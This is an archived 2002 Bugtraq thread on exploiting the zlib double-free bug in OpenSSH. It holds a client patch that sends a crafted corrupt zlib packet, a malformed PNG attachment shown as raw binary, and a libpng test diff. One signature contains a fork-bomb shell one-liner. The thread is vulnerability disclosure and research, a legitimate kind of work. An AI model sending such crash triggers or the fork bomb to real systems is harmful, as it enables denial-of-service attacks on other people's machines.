+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd"
+"\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd";
/*
* Initializes compression; level is compression level from 1 to 9
* (as in gzip).
*/
+
+
+
+void dump_hex (char *buf, int len, char *title)
+{
+ int x;
+ int y;
+ unsigned char *ptr;
+
+ fprintf(stderr, "[ %s - 0x%.8x - %d ]\n", title, buf, len);
+ y = 0;
+ ptr = buf;
+ for(x=0;x<len;x++)
+ {
+ if(y > 10) { y = 0; fprintf(stderr, "\"\n\""); }
+ fprintf(stderr, "\\x%.2x", *ptr);
+ y++;
+ ptr++;
+ }
+ fprintf(stderr, "\n\n");
+
+}
+
void
buffer_compress_init_send(int level)
{
@@ -63,7 +329,10 @@
incoming_stream.total_out == 0 ? 0.0 :
(double) incoming_stream.total_in / incoming_stream.total_out);
if (compress_init_recv_called == 1)
+ {
+ fprintf(stderr, "Calling inflateEnd\n");
inflateEnd(&incoming_stream);
+ }
if (compress_init_send_called == 1)
deflateEnd(&outgoing_stream);
}
@@ -82,11 +351,23 @@
{
u_char buf[4096];
int status;
-
+ static int cnt = 0;
+
+
/* This case is not handled below. */
if (buffer_len(input_buffer) == 0)
return;
+ if (cnt == 0)
+ {
+ fprintf(stderr, ">> sending corrupt zlib packet ;)\n");
+ buffer_append(output_buffer, boomij, 4096);
+ dump_hex(boomij, 4096, "boomij");
+
+ cnt++;
+ return;
+ }
+
/* Input is the contents of the input buffer. */
outgoing_stream.next_in = buffer_ptr(input_buffer);
outgoing_stream.avail_in = buffer_len(input_buffer);
@@ -135,6 +416,8 @@
incoming_stream.next_out = buf;
incoming_stream.avail_out = sizeof(buf);
+ dump_hex(buffer_ptr(input_buffer), buffer_len(input_buffer), "incoming");
+
status = inflate(&incoming_stream, Z_PARTIAL_FLUSH);
switch (status) {
case Z_OK: diff -u -r openssh-3.1p1/sshconnect2.c
openssh-3.1p1-zlib/sshconnect2.c
--- openssh-3.1p1/sshconnect2.c Tue Mar 12 03:33:02 2002
+++ openssh-3.1p1-zlib/sshconnect2.c Tue Mar 12 03:33:03 2002
@@ -75,9 +75,12 @@
ssh_kex2(char *host, struct sockaddr *hostaddr)
{
Kex *kex;
-
+ unsigned char testdata[4096];
xxx_host = host;
xxx_hostaddr = hostaddr;
+
+ memset(testdata, "A", 4095);
+ testdata[4095] = '\0';
if (options.ciphers == (char *)-1) {
log("No valid ciphers for protocol version 2 given, using defaults.");
@@ -119,13 +122,14 @@
session_id2 = kex->session_id;
session_id2_len = kex->session_id_len;
-#ifdef DEBUG_KEXDH
+
/* send 1st encrypted/maced/compressed message */
+ debug("sending malformed zlib packet...");
packet_start(SSH2_MSG_IGNORE);
- packet_put_cstring("markus");
+ packet_put_cstring(testdata);
packet_send();
packet_write_wait();
-#endif
+
debug("done: ssh_kex2.");
}
(8131455) /H D Moore <sflist@digitaloffense.net>/(Ombruten)
8131456 2002-03-12 03:57 -0600 /9 rader/ H D Moore <sflist@digitaloffense.net>
Bilagans filnamn: "png_of_doom.png"
Importerad: 2002-03-12 23:17 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <21375>
Bilaga (text/plain) till text 8131454
Ärende: Bilaga (png_of_doom.png) till: exploiting the zlib bug in openssh
------------------------------------------------------------
PNG
�
���
IHDR���0���0�����W�ù����gAMA�� 1è_��
zIDATxÚí]l�W�ÇwvvwÖñÆÞÆNvc7Ö¤¡}BòÐ"TDA¨ VTè¢Ò¨¼ òQ
Ayªh¥à�)�BB
�R�ª>��Ñ �Tb'µó¹¿¿âÙ]Û;wwfîåaïì7N²�*ªD®u5³ã;çÎ�û¿wàN»Óî´;íNûnâ�nþ¤��·0¨�;ôÿ�èÀx½É}â�ë�°?&ÃE��ÚÌx±
ôÍ@t�àwßù¦RJ£µ"T!õ@QW
@��a H Í_�(®y�JÀ6'C""aÛ$ì� ËBûuüZ
ß÷ BiM�*ü ¤*=ܪD©�;�ÀÏ�w�eú�����B��B �E�*öãÈes8ÝN£Û�2H)A6ûÁË/éOïèãù×^�ãÁZãJ)[?J%èí�à#/h´ÏÊl°34ç*�Àê�ÒøaH�(ÄÐ�Ï|>Ïêê*¡�c76º�$2äïÙ'\O6.8y}ì�àB¹·ßÆ1¾úÜaá
ÕÔ�Êmãs�u'¬X¿
�aH B|�r÷×£P(J¥(^)R¯ÔR¶¼�´�Ô�ÕòúDJNDÎ�^�äÝ�¢aîýòc_��ÛûõkG-VVW�6�l �·í¶�|êé#bhÇ�¶m�!nÅe~y¾e 9F�hfª�ò�¡ÛA^�GÎÏ#ãÆÆ7Ð)r�Àp�ðø�¾$^<|þîîñ]À� �ÙÞQ�øJ¡"Ìpyò2
îªKV£^oð¸�$íÄÊ���à�
C��÷;Q�Ø{üI¤ÓÈ¥nÏcë2}ü8ÙÚôÎ;¿�r��kß �á
�L�Ù�d´Gíàui²ëëÈ�ãà8Æ@ ñ"�Z!§&7Ú�Ö½�@^x¾Oÿì,kÕ*Ëóó)-�l�
À]o�[¹�fMö�¥Cz�8@oäܸ��
¯K;7ÇÄ vïÛÝ(��d6Çãã�xà�½�h�-©`�µ¿¿Oèû¬Ë]í5êM�Ø�dU`ÎPHw�@
ª1c;
â9¦âD�5#M@.}@îþ<G�å�ïýYüõí·8uêO�Ïü��=Ø Ó¢�$çaÏÏ£*eV¯]cqu)�P÷��C!*P�ê7Ëø¬hÕÃ�¥Ñ±�y-^ÓwïÛÍ�§%¯?ö�ÙzU?ûò÷Åb¢�Ïó(_+N§[ÏF� V#¼p�Ïuq]J¡\�ëÔÀNòeã}7zÒê@��?P�J53ª�ñä®�r�öíÛ;w¢´FYíwmçrñ2ÓÓÓ�àù�ï�",òÂ��ËBnÛƺ¬ëõZ� ÏLd®�áEô¶;Ñ5Ö�[¼mb$VF¥är¹fD��3ÿ<ùâ9vîØmÛ¸®»!SËtË�¥©)Jå2�
��ss¬KIî�3û��·�"6OXJk�9 âÔql§e¼Ýºîù�½}
Y` ¡�
èëïcÿ}û�I��ïÉdð��HË*¸\�ó++�íû�!4P�fÅûh¡f�¡jÔs3�6u©ù2hÐɱ�\Ïmþ�HX�÷Þ{/é-i�D#J¡$Ì°RYÁ ÕÛËT±[©0`ÕóH&Ø dÒ�2Ü1�.:Í�+TPéÖ�å\/È¢ÿKLü{Òr)�åõ2£££x×�g7¢Ô=µ@.gñìYÜ�N{R½mÛôôôÐÝ!É`<ïµ�+�ÍBÐJ7<î8-Ñ�Mý1�wåÊ�äÒ�ìèѼùæ<ûÒâı?òί¾ËéÓ§I§Ó
ÞKIO:ÉÊ¥K,MN2[©pQXd·f��� P(°ÅÉt2
1>²7¾Ö�vg«)�â:Å�ç?çyäóyF+CüëÜ�?ùí�l÷ÖõSÏKôl ð=ÉˤR)¶�/¢¶fYàZ©Ä)ßÇJgÈõä���D�eYZXb��bGëF�Ðíç�@oÐ8�4©��ÓÛÛËÞ½¬á¤ÓX5ååeÖì!Jå�:ÉÌO��àêûïS)¹¸¶N) ¯¿�òù<D�ËBÍ�KsIjßb�£3ukò±ÁénHL£-�êÀ¶mÛ¨«:=çÏS×¹zõ*ÊRìܽ|`á=Ët*Eya¹�Î�Ùî,ÃCÃ����è�!�Z£ ×o�ípÝ�´h�oT£ã8óxïvØ}ÏnºººH%möÝ¿=ÈÈÐ�õçyøÕW©{�K®ËD�bmé&¿#ÏÀÀ�éT��ù]8�¬X�[7Ëë¢
Fk´c;¢¡ã$N·Ó(jAã7@.kF)Ì`Û6IÛfïÐ^r¹��'þJßð0Çßx]<ÂGî
3W®ÒßÛË={ÈårXV˧ Ñô§h�¡o6�ëödÖZ£ôÆ�HI)7H���ÄW5LÕÙ�z³YæGG>w3cc�¯ûd³Yv
180Hº+Mm½Ö¢@ÄìQíNt��¥µ�R|ï'õÈCÜî^øé_áéC�ïïgzt%×eTkì Z«25;
5¿ÑIX�£ÂØ®�h¡&ûB¯ûrÝçÄ»ÇtÛ[jEºZ�j
c'¸«Ëak*Í®áa1yê�K®ËTu]Tõð�°ºÆ%o©ñ³nl�(��r �ñ ò~ض½rC��Ç4 ¸Éd'Æ:�o!�:zûçGîc¥XdòÂ�&«ëzÂIô}� !Ò©¤¶�h+ß�´Ö-úGº7� ÝI�4À[ï�Ï�=À�`Ð�·Åµ
$M©³ceÎ�ª_Ü¿û'F¾ýÑ{ï1>7wùccï�Û^ó²�k1.Z°\�ÌÒ10ãŨNVdÚÜ��ëfÀº9v�)c|t¶=��<úè�3ccLÎÌ�¿1ãE�94�yÚ�µ0�nzÅ�æz=�Du�ø�:°�3<êQ$" ÖS��ÞW�¾4;»òûññ��×Öjfy�1*À¤QXócÝ3ï4vËøÛ@Ôj1/EÆ£`ÇX_��9\)ùÛ+¯J3Æø.3æªÑø3À�3¢�£Mݼ7ê·M!Ñ�$h�§b/³ã}½R�ùÃ_&'O�ÛͺÖ2]�®Æt¾jKÒv�qúèNëlË|Ã"ßôDL£Ø±ódlû/º¾�Øe¶G2&&M�Ö1A[¹z�NÐ� m�½É¹½È2F�jm«+´«¦�Ì�ÏWqí3m<²íçú¶·×Ûô½°ý£µIÔt¬¢Ly\0×T[ÅÚdK]ý·_ht[^´�
oðÆQaÅPHÝäÓÓÍ�û7²ö1Xy
L2ê[|ôÓ|Âh[ÏÞêÃ^Çí? Ä®ðÄö����IEND®B`
(8131456) /H D Moore <sflist@digitaloffense.net>/(Ombruten)
8131457 2002-03-12 03:57 -0600 /108 rader/ H D Moore <sflist@digitaloffense.net>
Bilagans filnamn: "libpng_zlib_test.diff"
Importerad: 2002-03-12 23:17 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <21376>
Bilaga (text/plain) till text 8131454
Ärende: Bilaga (libpng_zlib_test.diff) till: exploiting the zlib bug in openssh
------------------------------------------------------------
diff -r -u libpng-1.2.1/pngconf.h libpng-1.2.1-zlib-test/pngconf.h
--- libpng-1.2.1/pngconf.h Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngconf.h Tue Mar 12 03:35:19 2002
@@ -30,7 +30,7 @@
*/
#ifndef PNG_ZBUF_SIZE
-# define PNG_ZBUF_SIZE 8192
+# define PNG_ZBUF_SIZE 4096
#endif
/* Enable if you want a write-only libpng */
diff -r -u libpng-1.2.1/pngread.c libpng-1.2.1-zlib-test/pngread.c
--- libpng-1.2.1/pngread.c Tue Mar 12 03:35:20 2002
+++ libpng-1.2.1-zlib-test/pngread.c Tue Mar 12 03:35:19 2002
@@ -42,7 +42,9 @@
#endif
int i;
-
+ int x;
+ char *ptr;
+
png_debug(1, "in png_create_read_struct\n");
#ifdef PNG_USER_MEM_SUPPORTED
if ((png_ptr = (png_structp)png_create_struct_2(PNG_STRUCT_PNG,
@@ -117,6 +119,7 @@
}
}
+
/* initialize zbuf - compression buffer */
png_ptr->zbuf_size = PNG_ZBUF_SIZE;
png_ptr->zbuf = (png_bytep)png_malloc(png_ptr,
@@ -125,6 +128,8 @@
png_ptr->zstream.zfree = png_zfree;
png_ptr->zstream.opaque = (voidpf)png_ptr;
+
+
switch (inflateInit(&png_ptr->zstream))
{
case Z_OK: /* Do nothing */ break;
@@ -134,11 +139,13 @@
default: png_error(png_ptr, "Unknown zlib error");
}
+
png_ptr->zstream.next_out = png_ptr->zbuf;
png_ptr->zstream.avail_out = (uInt)png_ptr->zbuf_size;
png_set_read_fn(png_ptr, png_voidp_NULL, png_rw_ptr_NULL);
+
return (png_ptr);
}
@@ -523,6 +530,10 @@
const int png_pass_mask[7] = {0x80, 0x08, 0x88, 0x22, 0xaa, 0x55, 0xff};
#endif
int ret;
+ int x;
+ char *ptr;
+ int i;
+
png_debug2(1, "in png_read_row (row %lu, pass %d)\n",
png_ptr->row_number, png_ptr->pass);
/* save jump buffer and error functions */
@@ -669,6 +680,28 @@
(png_size_t)png_ptr->zstream.avail_in);
png_ptr->idat_size -= png_ptr->zstream.avail_in;
}
+
+ fprintf(stderr, "zbuf_size = %d\n", (uInt)png_ptr->zbuf_size);
+ fprintf(stderr, "input size: %d\n", (uInt)png_ptr->zstream.avail_in);
+ fprintf(stderr, "compression level: %d\n", (uInt)png_ptr->zlib_level);
+
+
+ ptr = png_ptr->zbuf;
+ for (x=0;x<(uInt)png_ptr->zbuf_size;x++)
+ {
+ if (i > 16)
+ {
+ i =0;
+ fprintf(stderr, "\"\n\"");
+ }
+
+ fprintf(stderr, "\\x%.2x", (unsigned char ) *ptr);
+ *ptr++;
+ i++;
+ }
+ fprintf(stderr, "\n\n", png_ptr->zbuf);
+
+
ret = inflate(&png_ptr->zstream, Z_PARTIAL_FLUSH);
if (ret == Z_STREAM_END)
{
@@ -1214,6 +1247,9 @@
png_free(png_ptr, png_ptr->time_buffer);
#endif
+ //fprintf(stderr, "zbuf is at 0x%.8x and is %d bytes\n", &png_ptr->zbuf,&png_ptr->zbuf_size);
+
+
inflateEnd(&png_ptr->zstream);
#ifdef PNG_PROGRESSIVE_READ_SUPPORTED
png_free(png_ptr, png_ptr->save_buffer);
(8131457) /H D Moore <sflist@digitaloffense.net>/---
8132209 2002-03-12 18:03 -0600 /50 rader/ Michael Leo <mleo@cariboulake.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-13 05:39 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21394>
Kommentar till text 8131454 av H D Moore <sflist@digitaloffense.net>
Ärende: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris
------------------------------------------------------------
From: Michael Leo <mleo@cariboulake.com>
To: bugtraq@securityfocus.com
Message-ID: <4.3.2.7.2.20020312175352.032c4328@127.0.0.1>
Gang,
OK, so there might be a way to exploit the zlib problems in OpenSSH.
I have primarily Solaris 7 & 8 systems, and I decided to build a new
zlib (in /usr/local/lib) and rebuild OpenSSH.
Following the directions in OpenSSH, I used a configure command
like this:
./configure --with-zlib=/usr/local
However, the resulting binaries still use Solaris' own copy of
of libz.so in /lib. Here is the ldd output of the new binary:
% ldd ssh
libz.so => /lib/libz.so
libsocket.so.1 => /lib/libsocket.so.1
libnsl.so.1 => /lib/libnsl.so.1
libc.so.1 => /lib/libc.so.1
libdl.so.1 => /lib/libdl.so.1
libmp.so.2 => /lib/libmp.so.2
/usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1
%
Modifying LD_LIBRARY_PATH does not seem to help.
I have to dig into the makefiles, but I thought people might
want to know.
Replacing the Solaris /lib/libz.so library is undesirable, at least
at our site.
Convincing the OpenSSH build to use the PROPER libz in /usr/local/lib
is apparently no easy task.
Hope this helps,
Michael Leo mleo@cariboulake.com Java, Oracle
Caribou Lake Software http://www.cariboulake.com Ingres, JDBC
JSockets/JMobility: Tunnelling sockets over HTTP - REALLY!
(8132209) /Michael Leo <mleo@cariboulake.com>/(Ombruten)
Kommentar i text 8136943 av Christopher X. Candreva <chris@westnet.com>
8136943 2002-03-12 22:14 -0500 /24 rader/ Christopher X. Candreva <chris@westnet.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-13 23:23 av Brevbäraren
Extern mottagare: Michael Leo <mleo@cariboulake.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21405>
Kommentar till text 8132209 av Michael Leo <mleo@cariboulake.com>
Ärende: Re: OpenSSH rebuild warning: problems avoiding zlib problems in Solaris
------------------------------------------------------------
From: "Christopher X. Candreva" <chris@westnet.com>
To: Michael Leo <mleo@cariboulake.com>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.GSO.4.44.0203122212420.15432-100000@westnet>
On Tue, 12 Mar 2002, Michael Leo wrote:
> Gang,
>
> OK, so there might be a way to exploit the zlib problems in OpenSSH.
>
> I have primarily Solaris 7 & 8 systems, and I decided to build a new zlib
> (in /usr/local/lib) and rebuild OpenSSH.
With Solaris 8, you can finally set the library load paths and order.
See man pages for ld.so.0 and crle
==========================================================
Chris Candreva -- chris@westnet.com -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/
(8136943) /Christopher X. Candreva <chris@westnet.com>/(Ombruten)
Kommentar i text 8137993 av Brent J. Nordquist <b-nordquist@bethel.edu>
8131677 2002-03-12 12:12 -0500 /32 rader/ Michal Zalewski <lcamtuf@coredump.cx>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-13 00:24 av Brevbäraren
Extern mottagare: H D Moore <sflist@digitaloffense.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vulnwatch@vulnwatch.org
Mottagare: Bugtraq (import) <21379>
Ärende: Re: [VulnWatch] exploiting the zlib bug in openssh
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@coredump.cx>
To: H D Moore <sflist@digitaloffense.net>
Cc: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>
Message-ID: <Pine.LNX.4.42.0203121204130.633-100000@nimue.bos.bindview.com>
On Tue, 12 Mar 2002, H D Moore wrote:
> I patched the OpenSSH client to send this corrupt zlib buffer after the
> key exchange, the inflate() call on the remote end is returning the
> correct value indicating that the buffer did what it was supposed to
> (Z_MEM_ERR or -4), but the remote daemon is NOT crashing during the
> fatal_cleanup() and inflateEnd() calls. Taking the same buffer and
> sticking it into the inflate() call of another application causes the
> desired SEGV and possible path to exploitability, so why isn't OpenSSH
> crashing?
I think I researached this problem few months ago. I found this
condition while performing fuzz-alike test on zlib, thinking
specifically about one of SSH implementations. The problem with
exploiting it in OpenSSH checks are strict enough to exit almost
immediately, after first inflate() call returns error - while the bug
needed second inflate() call or inflateEnd() call to be exploited
(don't remember extactly). One way or another, I found this not
exploitable and gave up on this bug.
--
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
http://lcamtuf.coredump.cx/photo/
(8131677) /Michal Zalewski <lcamtuf@coredump.cx>/(Ombruten)